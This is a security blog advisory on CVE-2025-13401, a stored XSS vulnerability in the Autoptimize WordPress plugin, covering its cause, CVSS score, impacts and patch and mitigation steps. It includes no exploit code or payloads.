Cybersecurity Vulnerabilities

CVE-2025-13401: Critical Stored XSS Vulnerability in Autoptimize WordPress Plugin

December 3, 2025 - By 

Overview

A stored Cross-Site Scripting (XSS) vulnerability, identified as CVE-2025-13401, has been discovered in the Autoptimize plugin for WordPress. This vulnerability affects all versions up to and including 3.1.13. It allows authenticated attackers with Contributor-level access or higher to inject malicious JavaScript code into website pages. When a user visits a page containing the injected script, the script will execute, potentially leading to account compromise, data theft, or other malicious actions.

Technical Details

The vulnerability resides within the create_img_preload_tag function related to the LCP (Largest Contentful Paint) Image preloading metabox. Insufficient input sanitization and output escaping of user-supplied image attributes create an opportunity for attackers to inject arbitrary web scripts. Specifically, the plugin fails to properly sanitize user input when creating the image preload tag, which is then rendered on the page. An attacker can inject malicious code within an image attribute, such as the src or alt tag, which will then be executed when the page is loaded.

CVSS Analysis

The Common Vulnerability Scoring System (CVSS) score for CVE-2025-13401 is 6.4 (Medium).

  • Attack Vector (AV): Network (N)
  • Attack Complexity (AC): Low (L)
  • Privileges Required (PR): Low (L)
  • User Interaction (UI): Required (R)
  • Scope (S): Changed (C)
  • Confidentiality Impact (C): Low (L)
  • Integrity Impact (I): Low (L)
  • Availability Impact (A): Low (L)

This score reflects the fact that the attacker needs to be authenticated (at least as a Contributor), and user interaction is required for the exploit to execute (e.g., a user visiting the compromised page). However, the low attack complexity and the potential for code execution make this a significant security concern.

Possible Impact

Successful exploitation of this vulnerability can have several serious consequences:

  • Account Compromise: An attacker could potentially steal administrator cookies or credentials, gaining full control over the WordPress website.
  • Data Theft: Sensitive information could be accessed and exfiltrated.
  • Malicious Redirection: Users could be redirected to phishing sites or other malicious websites.
  • Website Defacement: The attacker could modify the website’s content, damaging its reputation.
  • Malware Distribution: The injected script could be used to distribute malware to website visitors.

Mitigation and Patch Steps

To protect your website from CVE-2025-13401, it is crucial to take the following steps:

  1. Update Autoptimize: Immediately update the Autoptimize plugin to the latest available version. Versions after 3.1.13 contain the necessary fixes to address this vulnerability.
  2. Review User Roles: Carefully review the roles and permissions assigned to WordPress users. Limit Contributor access to only trusted individuals.
  3. Implement Web Application Firewall (WAF): Deploy a WAF to help detect and block XSS attacks.
  4. Regular Security Audits: Conduct regular security audits of your WordPress website and plugins.

References

Cybersecurity specialist and founder of Gowri Shankar Infosec - a professional blog dedicated to sharing actionable insights on cybersecurity, data protection, server administration, and compliance frameworks including SOC 2, PCI DSS, and GDPR.

Related Posts

CVE-2025-61932 Critical Remote Code Execution Vulnerability in LANSCOPE Endpoint Manager

CVE-2025-61932: Critical Remote Code Execution Vulnerability in LANSCOPE Endpoint Manager

October 23, 2025

Leave a Reply

Your email address will not be published. Required fields are marked *